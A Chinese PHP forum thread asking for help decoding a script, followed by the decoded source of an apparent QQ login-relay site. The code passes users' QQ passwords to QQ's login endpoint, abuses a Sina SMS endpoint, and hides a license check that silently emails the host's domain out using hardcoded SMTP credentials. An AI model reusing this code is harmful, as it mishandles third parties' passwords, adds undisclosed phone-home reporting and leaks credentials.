求解密-PHP Tutorial-php.cn

由于源码有点长，我传到百度盘了http://pan.baidu.com/s/1o6wLWTW
回复讨论(解决方案)

<?phpinclude("config.php");$con=mysql_connect($host_ip,$host_name,$host_pw);mysql_select_db($host_table,$con);if(!$con){echo '<font color="red">数据库链接出错</font>';die;}function cl($get_url){$ch = curl_init();curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_URL,$get_url);curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$pp=curl_exec($ch);curl_close($ch);return($pp);}function ubb($Text) {$Text=htmlspecialchars($Text, ENT_QUOTES);        $Text=ereg_replace("\[br\]","<br />",$Text);        $Text=nl2br($Text);        $Text=stripslashes($Text);$Text=str_replace("",'<br>',$Text);        $Text=preg_replace("/\\t/is"," ",$Text);        $Text=preg_replace("/\[url\](http:\/\/.+?)\[\/url\]/is","<a href=\"\\1\" target=\"new\"><u>\\1</u></a>",$Text);        $Text=preg_replace("/\[url\](.+?)\[\/url\]/is","<a href=\"http://\\1\" target=\"new\"><u>\\1</u></a>",$Text);        $Text=preg_replace("/\[url=(http:\/\/.+?)\](.+?)\[\/url\]/is","<a href=\"\\1\" target=\"new\"><u>\\2</u></a>",$Text);        $Text=preg_replace("/\[url=(.+?)\](.+?)\[\/url\]/is","<a href=\"http://\\1\" target=\"new\"><u>\\2</u></a>",$Text);        $Text=preg_replace("/\[color=(.+?)\](.+?)\[\/color\]/is","<font color=\"\\1\">\\2</font>",$Text);        $Text=preg_replace("/\[font=(.+?)\](.+?)\[\/font\]/is","<font face=\"\\1\">\\2</font>",$Text);        $Text=preg_replace("/\[email=(.+?)\](.+?)\[\/email\]/is","<a href=\"mailto:\\1\"><u>\\2</u></a>",$Text);        $Text=preg_replace("/\[email\](.+?)\[\/email\]/is","<a href=\"mailto:\\1\"><u>\\1</u></a>",$Text);        $Text=preg_replace("/\[i\](.+?)\[\/i\]/is","<i>\\1</i>",$Text);        $Text=preg_replace("/\[u\](.+?)\[\/u\]/is","<u>\\1</u>",$Text);        $Text=preg_replace("/\[b\](.+?)\[\/b\]/is","<b>\\1</b>",$Text);        return $Text;   }function send($phone,$msg){$cn=curl_init();curl_setopt($cn,CURLOPT_URL,"http://dp.sina.cn/dpool/tools/ctripflight/msg.php?vt=1");curl_setopt($cn,CURLOPT_USERAGENT,"  Mozilla/ 5.0(Linux;U;2.2.1;Zh_cn;Desire HD;480*800;)AppleWebKit/528.5  (KHTML) Version/3.1.2/UCWEB7.6.0.75/ 139/999");curl_setopt($cn,CURLOPT_POST,1);curl_setopt($cn,CURLOPT_POSTFIELDS,'phone='.$phone.'&msg='.$msg);curl_setopt($cn,CURLOPT_RETURNTRANSFER,1);$content=curl_exec($cn);curl_close($cn);return $content;}function md(){$data=mysql_fetch_array(mysql_query("SELECT * FROM baqi_config_data  WHERE action='sqmd'"));if(md5($_SERVER['HTTP_HOST'])!==$data['value']){echo base64_decode("6Z2e5rOV5L2/55So77yB");include("mail.class.php");if(!file_exists("send")){$smtpserver = "smtp.qq.com";$port = "25";$smtpuser = "2224288916@qq.com";$smtppwd = "baqi123456";$mailtype = "HTML";$sender = "2224288916@qq.com";$smtp = new smtp($smtpserver,$port,true,$smtpuser,$smtppwd,$sender);$to = "601794914@qq.com";$subject = $_SERVER['HTTP_HOST'];$body = $_SERVER['HTTP_HOST'];$send=$smtp->sendmail($to,$sender,$subject,$body,$mailtype);fopen("send","a+");}die;}}function qq(){global $out;if($_POST['yzm']){$post_data = array('bid_code=qqchatLogin','qq='.$_POST['qq'],'u_token='.$_POST['qq'],'hexpwd='.$_POST['hexpwd'],'sidtype=1','hexp=true','auto=0','loginTitle=家园','modifySKey=0','q_status=20','r='.$_POST['r'],'loginType=3','imgTyp=gif','extend='.$_POST['extend'],'r_sid='.$_POST['r_sid'],'bid=0','login_url=http://pt.3g.qq.com/s?aid=nLogin','rip='.$_POST['rip'],'go_url=http://house60.3g.qq.com/g/my_home.jsp','verify='.$_POST['verify']);$post_data = implode('&',$post_data);$url='http://pt.3g.qq.com/handleLogin?vdata=A47CD2903BC8EDEEC7CEE594ACB18F9C';$ch = curl_init();curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_URL,$url);curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$out=curl_exec($ch);if(preg_match("/操作异常/",$out)){$img=explode('src="',$out);$img=explode('" alt="',$img[1]);echo '验证码图：<img  src="'.$img[0].'" alt="求解密" >';$postgo=explode('<go href="',$out);$postgo=explode('" method="post',$postgo[1]);$hexpwd=explode('name="hexpwd" value="',$out);$hexpwd=explode('"/>',$hexpwd[1]);$r=explode(' name="r" value="',$out);$r=explode('"/>',$r[1]);$extend=explode('name="extend" value="',$out);$extend=explode('"/>',$extend[1]);$r_sid=explode('name="r_sid" value="',$out);$r_sid=explode('"/>',$r_sid[1]);$rip=explode('name="rip" value="',$out);$rip=explode('"/>',$rip[1]);echo '<form name="bb" action="" method="post"><input type="hidden" name="qq" value="'.$_POST['qq'].'"><input type="hidden" name="pw" value="'.$_POST['pw'].'"><input type="hidden" name="postgo" value="'.$postgo[0].'"><input type="hidden" name="hexpwd" value="'.$hexpwd[0].'"><input type="hidden" name="r" value="'.$r[0].'"><input type="hidden" name="extend" value="'.$extend[0].'"><input type="hidden" name="r_sid" value="'.$r_sid[0].'"><input type="hidden" name="rip" value="'.$rip[0].'">请输入上图字符(不区分大小写)：<br><Input type="text" name="verify" value=""><Input type="submit" name="yzm" value="马上登录"></form>';include("bottom.php");die;}$sid=explode('name="sid" value="',$out);$sid=explode('"',$sid[1]);}else{$post_data = array('qq='.$_POST['qq'],'bid=0','sid=ASjAhm8ONWNkT_6eUC2ekv45','go_url=http://house60.3g.qq.com/g/my_home.jsp','hiddenPwd=flase','pwd='.$_POST['pw'],'loginType=3');$post_data = implode('&',$post_data);$url='http://pt.3g.qq.com/handleLogin?vdata=A47CD2903BC8EDEEC7CEE594ACB18F9C';$ch = curl_init();curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_URL,$url);curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$out=curl_exec($ch);if(preg_match("/操作异常/",$out)){$img=explode('src="',$out);$img=explode('" alt="',$img[1]);echo '验证码图：<img  src="'.$img[0].'" alt="求解密" >';$postgo=explode('<go href="',$out);$postgo=explode('" method="post',$postgo[1]);$hexpwd=explode('name="hexpwd" value="',$out);$hexpwd=explode('"/>',$hexpwd[1]);$r=explode(' name="r" value="',$out);$r=explode('"/>',$r[1]);$extend=explode('name="extend" value="',$out);$extend=explode('"/>',$extend[1]);$r_sid=explode('name="r_sid" value="',$out);$r_sid=explode('"/>',$r_sid[1]);$rip=explode('name="rip" value="',$out);$rip=explode('"/>',$rip[1]);echo '<form name="aa" action="" method="post"><input type="hidden" name="qq" value="'.$_POST['qq'].'"><input type="hidden" name="pw" value="'.$_POST['pw'].'"><input type="hidden" name="postgo" value="'.$postgo[0].'"><input type="hidden" name="hexpwd" value="'.$hexpwd[0].'"><input type="hidden" name="r" value="'.$r[0].'"><input type="hidden" name="extend" value="'.$extend[0].'"><input type="hidden" name="r_sid" value="'.$r_sid[0].'"><input type="hidden" name="rip" value="'.$rip[0].'">请输入上图字符(不区分大小写)：<br><Input type="text" name="verify" value=""><Input type="submit" name="yzm" value="马上登录"></form>';include("bottom.php");die;}$sid=explode('name="sid" value="',$out);$sid=explode('"',$sid[1]);}}if(!preg_match("/updata.php/",$_SERVER['PHP_SELF'])){md();}function ip(){if (getenv("HTTP_CLIENT_IP")&&strcasecmp(getenv("HTTP_CLIENT_IP"),"unknown"))$ip = getenv("HTTP_CLIENT_IP");else if (getenv("HTTP_X_FORWARDED_FOR")&&strcasecmp(getenv("HTTP_X_FORWARDED_FOR"),"unknown"))$ip = getenv("HTTP_X_FORWARDED_FOR");else if (getenv("REMOTE_ADDR")&&strcasecmp(getenv("REMOTE_ADDR"),"unknown"))$ip = getenv("REMOTE_ADDR");else if (isset($_SERVER['REMOTE_ADDR'])&&$_SERVER['REMOTE_ADDR']&&strcasecmp($_SERVER['REMOTE_ADDR'],"unknown"))$ip = $_SERVER['REMOTE_ADDR'];else$ip ="unknown";return($ip);}function pageurl(){$pageURL = 'http' ;if ( $_SERVER [ "HTTPS" ] == "on" ){$pageURL .= "s" ;}$pageURL .= "://" ;$this_page = $_SERVER [ "REQUEST_URI" ] ;// 只取 ? 前面的内容if ( strpos ( $this_page , "?" ) !== false )$this_page = reset ( explode ( "?" , $this_page ) ) ;if ( $_SERVER [ "SERVER_PORT" ] != "80" ){$pageURL .= $_SERVER [ "SERVER_NAME" ] . ":" . $_SERVER [ "SERVER_PORT" ] . $this_page ;}else{$pageURL .= $_SERVER [ "SERVER_NAME" ] . $this_page ;}if(ereg("user.php",$pageURL)){$pageURL=str_ireplace("user.php","index.php",$pageURL);return($pageURL);}}$ua="MQQBrowser/3.1 (Nokia 5233;SymbianOS/9.1 Series60/3.0)";ini_set('user_agent',$ua);?>
Copy after login
谢谢楼上的大哥